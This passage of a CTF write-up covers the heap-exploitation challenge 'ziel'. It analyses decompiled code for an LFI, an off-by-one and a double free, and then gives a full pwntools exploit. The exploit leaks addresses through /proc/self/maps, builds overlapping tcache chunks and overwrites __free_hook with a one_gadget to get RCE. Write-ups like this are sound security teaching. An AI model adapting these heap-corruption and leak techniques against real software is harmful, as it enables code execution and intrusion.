      if (('\x1f' < cVar1) && (cVar1 != '\x7f')) {
        if (cVar1 == ' ') {
          local_14 = local_14 + 1;
        }
        else {
          pvVar3 = malloc(0x15);
          *(void **)(layout_addresses + (long)local_14 * 8) = pvVar3;
          **(char **)(layout_addresses + (long)local_14 * 8) = cVar1;
          *(undefined4 *)(*(long *)(layout_addresses + (long)local_14 * 8) + 4) = 0;
          *(undefined4 *)(*(long *)(layout_addresses + (long)local_14 * 8) + 8) = 0;
          local_14 = local_14 + 1;
        }
      }
    }
    fclose(__stream);
  }
  return;
}

If we alter the save code, we can do LFI, with a maximum of 0x40 file name length.

According to the list, I can only pass the first element:
✓ 1. Flag is not read protected and it’s name is flag/flag.txt
✗ 2. Flag is not read protected and it’s name is random
✗ 3. Flag is read protected, must get RCE.

Ofc, there is a way to get RCE :)

Second Bug

There is an off by one in the spawn function:

puts("- Input description.");
printf("Text length: ");
uVar3 = read_int();
if (((int)uVar3 < 0xc9) && (0 < (int)uVar3)) {
  iVar5 = width * iVar2;
  pvVar4 = malloc((long)(int)(uVar3 + 0xb));
  *(void **)(layout_addresses + (long)(iVar5 + iVar1) * 8) = pvVar4;
  printf("Description: ");
  iVar3 = my_read(local_e8,(ulong)uVar3,(ulong)uVar3);
  **(char **)(layout_addresses + (long)(iVar1 + width * iVar2) * 8) = local_ed[0];
  *(int *)(*(long *)(layout_addresses + (long)(iVar1 + width * iVar2) * 8) + 4) = local_108;
  *(int *)(*(long *)(layout_addresses + (long)(iVar1 + width * iVar2) * 8) + 8) = local_104;
  memcpy((void *)(*(long *)(layout_addresses + (long)(iVar1 + width * iVar2) * 8) + 0xc),
         local_e8,(long)iVar3);
}
else {
  puts("Invalid length.");
}

The memory malloced is size of desc + 0xb, but the desc starts to be written at address + 0xc, hence the off by one.

Using this off by one, we can create overlapping chunks, and as a consequence we can get an arbitrary write, overwrite free hook with a one gadget and get easy RCE!

Info leak?

Well, since PIE is enabled, getting an info leak is a bit tricky. Long story short, we can get an info leak from a certain file. Using the LFI read trick I mentioned above, we can open dan read the file /proc/self/maps. This file is basically what is printed by gdb when you type in the command info proc mappings.

Example:

pwn1810@2d1f2027d54d:~$ cat /proc/self/maps
55de5f98c000-55de5f98e000 r--p 00000000 08:02 28707441                   /bin/cat
55de5f98e000-55de5f993000 r-xp 00002000 08:02 28707441                   /bin/cat
55de5f993000-55de5f996000 r--p 00007000 08:02 28707441                   /bin/cat
55de5f996000-55de5f997000 r--p 00009000 08:02 28707441                   /bin/cat
55de5f997000-55de5f998000 rw-p 0000a000 08:02 28707441                   /bin/cat
55de618b7000-55de618d8000 rw-p 00000000 00:00 0                          [heap]
7fa7ffb3c000-7fa7ffb5e000 rw-p 00000000 00:00 0 
7fa7ffb5e000-7fa7ffb65000 r--s 00000000 08:02 28836792                   /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache
7fa7ffb65000-7fa7ffb97000 r--p 00000000 08:02 28836518                   /usr/lib/locale/C.UTF-8/LC_CTYPE
7fa7ffb97000-7fa7ffbb9000 r--p 00000000 08:02 28836043                   /lib/x86_64-linux-gnu/libc-2.28.so
7fa7ffbb9000-7fa7ffd2a000 r-xp 00022000 08:02 28836043                   /lib/x86_64-linux-gnu/libc-2.28.so
7fa7ffd2a000-7fa7ffd76000 r--p 00193000 08:02 28836043                   /lib/x86_64-linux-gnu/libc-2.28.so
7fa7ffd76000-7fa7ffd77000 ---p 001df000 08:02 28836043                   /lib/x86_64-linux-gnu/libc-2.28.so
7fa7ffd77000-7fa7ffd7b000 r--p 001df000 08:02 28836043                   /lib/x86_64-linux-gnu/libc-2.28.so
7fa7ffd7b000-7fa7ffd7d000 rw-p 001e3000 08:02 28836043                   /lib/x86_64-linux-gnu/libc-2.28.so
7fa7ffd7d000-7fa7ffd83000 rw-p 00000000 00:00 0 
7fa7ffd89000-7fa7ffd8a000 r--p 00000000 08:02 28836025                   /lib/x86_64-linux-gnu/ld-2.28.so
7fa7ffd8a000-7fa7ffdaa000 r-xp 00001000 08:02 28836025                   /lib/x86_64-linux-gnu/ld-2.28.so
7fa7ffdaa000-7fa7ffdb2000 r--p 00021000 08:02 28836025                   /lib/x86_64-linux-gnu/ld-2.28.so
7fa7ffdb2000-7fa7ffdb3000 r--p 00028000 08:02 28836025                   /lib/x86_64-linux-gnu/ld-2.28.so
7fa7ffdb3000-7fa7ffdb4000 rw-p 00029000 08:02 28836025                   /lib/x86_64-linux-gnu/ld-2.28.so
7fa7ffdb4000-7fa7ffdb5000 rw-p 00000000 00:00 0 
7fffb054a000-7fffb056b000 rw-p 00000000 00:00 0                          [stack]
7fffb05b0000-7fffb05b3000 r--p 00000000 00:00 0                          [vvar]
7fffb05b3000-7fffb05b4000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]

With this file, basically we have all our required info leaks!

Overlapping chunks

If you’ve ever read the how2heap github repository by shellphish, there are tricks that they explain on how to get overlapping chunks. However, the tricks they use are done when tcache is off or on chunks that aren’t affecting by tcache (i.e. greater than 0x400). Because of that I won’t be using the overlapping chunks trick, but a different one, i.e. The House of Spirit.

Since we can overwrite a chunk’s size with any value from 0x00-0xff, we can instead INCREASE the size of a chunk. With tcache chunks, there is basically no check on the house of spirit trick. Thus, we can increase the chunks to any size, and free it. If we increase a chunks to a size +0x20 (or any size), we can free it, allocate it again, and it will overlap the chunks after.

Illustration: Error

Now all I have to do is corrupt the fd pointer, and boom. Arbitrary write.

Here’s my full exploit:

from pwn import *

p = process('./ziel')

def next():
  p.sendlineafter('>', '1')

def spawn(x_pos, y_pos, identifier, x_vel, y_vel, desc_len, desc):
  p.sendlineafter('>', '2')
  p.sendlineafter('X:', str(x_pos))
  p.sendlineafter('Y:', str(y_pos))
  p.sendlineafter('ID:', str(identifier))
  p.sendlineafter('X:', str(x_vel))
  p.sendlineafter('Y:', str(y_vel))
  p.sendlineafter('length:', str(desc_len))
  p.sendlineafter('Description:', str(desc))

def kill(x_pos, y_pos):
  p.sendlineafter('>', '3')
  p.sendlineafter('X:', str(x_pos))
  p.sendlineafter('Y:', str(y_pos))

def save():
  p.sendlineafter('>', '4')

def load():
  p.sendlineafter('>', '5')

def restart():
  p.sendlineafter('>', '6')


p.sendlineafter('code:', '')
p.sendlineafter('Width:', '40')
p.sendlineafter('Height:', '1')


# leak maps
spawn(19, 0, 'd', 0, 0, 0x40-0xb, 'a'*(0x40-0xb))
kill(19, 0)
restart()

p.sendlineafter('code:', 'asdf')
p.sendlineafter('Width:', '128')
p.sendlineafter('Height:', '16')

maps = '../proc/self/maps'
for i in range(len(maps)):
  spawn(i, 0, maps[i], 0, 0, 1, 'a')

save()
load()
next()

p.recvuntil('|')
binary_leak = int(p.recvuntil('-')[:-1], 16)
heap_leak = int(p.recvuntil('[heap]')[-83:-70], 16)
libc_leak = int(p.recvuntil('-')[:-1], 16)
print hex(binary_leak)
print hex(heap_leak)
print hex(libc_leak)

# get arbitrary write
for i in range(128):
  for j in range(16):
    kill(i, j)
next()

spawn(0, 0, 'd', 0, 0, 0x30-0xb-8, 'b')
spawn(1, 0, 'd', 0, 0, 0x30-0xb-8, 'b')
spawn(2, 0, 'd', 0, 0, 0x30-0xb-8, 'b')
spawn(3, 0, 'd', 0, 0, 0x30-0xb-8, 'b')
spawn(4, 0, 'd', 0, 0, 0x30-0xb-8, 'b')
kill(1, 0)
spawn(5, 0, 'd', 0, 0, 0x30-0xb-8, 'b'*(0x30-0xb-8-1) + '\x61')
kill(2, 0)
kill(3, 0)

# win
one_gadgets = [0x50186, 0x501e3, 0x103f50]
one_gadget = libc_leak + one_gadgets[2]
free_hook = libc_leak + 0x1e68e8

spawn(6, 0, 'd', 0, 0, 0x60-0xb-8, 'b'*(0x30-0xb-8-1) + p64(0x31) + p64(free_hook-0x10))
spawn(7, 0, 'd', 0, 0, 0x30-0xb-8, 'b')
spawn(8, 0, 'd', 0, 0, 0x30-0xb-8, 'a'*4 + p64(one_gadget)*2)
kill(0, 0)


p.interactive()
p.close()

Error

Extra notes

There is a double free bug that we can abuse in the next function. Basically, if two lifeforms “crash”, they will both be freed. There is no check if the lifeform is “dead”, so by killing the lifeform first and then having another lifeform crash it, it will be double freed.

Noone solved this challenge during the competition (AFAIK).

Final Thoughts

This was my favorite CTF so far. It shows that throughout the entire year, I’ve learnt alot and have been able to prove that I’m just as capable as other CTF players in my country, even ones that are older and more experienced than me. Problems at this level are awesome, but I wouldn’t recommend this level as the standard for Binary Exploitation. Maybe 1 or 2 at this level for University CTF’s please :v.

Tell me if you want a writeup on the web challenges, I might do them :v.